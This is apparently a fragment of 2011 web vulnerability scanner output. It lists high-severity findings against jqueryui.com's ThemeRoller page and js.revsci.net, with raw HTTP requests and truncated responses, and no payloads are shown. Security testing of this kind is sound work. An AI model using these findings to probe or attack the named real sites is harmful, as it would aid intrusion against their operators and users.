HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Wed, 06 Jul 2011 11:23:20 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 X-Served-By: www4 X-Proxy: 2 Content-Length: 120133 <!DOCTYPE html> <html> <head> <meta charset="UTF-8" /> <title>jQuery UI - ThemeRoller</title> <meta name="keywords" content="jquery,user interface,ui,widgets <meta nam ...[SNIP]... xtureError=05_inset_soft ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://jqueryui.com |
Path: | /themeroller/ |
GET /themeroller/?ffDefault Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Wed, 06 Jul 2011 11:23:23 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 X-Served-By: www3 X-Proxy: 2 Content-Length: 120133 <!DOCTYPE html> <html> <head> <meta charset="UTF-8" /> <title>jQuery UI - ThemeRoller</title> <meta name="keywords" content="jquery,user interface,ui,widgets <meta nam ...[SNIP]... a&iconColorError=cd0a0a ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://jqueryui.com |
Path: | /themeroller/ |
GET /themeroller/?ffDefault Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Wed, 06 Jul 2011 11:23:23 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 X-Served-By: www3 X-Proxy: 2 Content-Length: 120130 <!DOCTYPE html> <html> <head> <meta charset="UTF-8" /> <title>jQuery UI - ThemeRoller</title> <meta name="keywords" content="jquery,user interface,ui,widgets <meta nam ...[SNIP]... a0a&bgColorOverlay=aaaaaa ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://js.revsci.net |
Path: | /gateway/gw.js |
GET /gateway/gw.js?csid Host: js.revsci.net Proxy-Connection: keep-alive Referer: http://techflash.com/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: NETID01=f6600bc0a975 |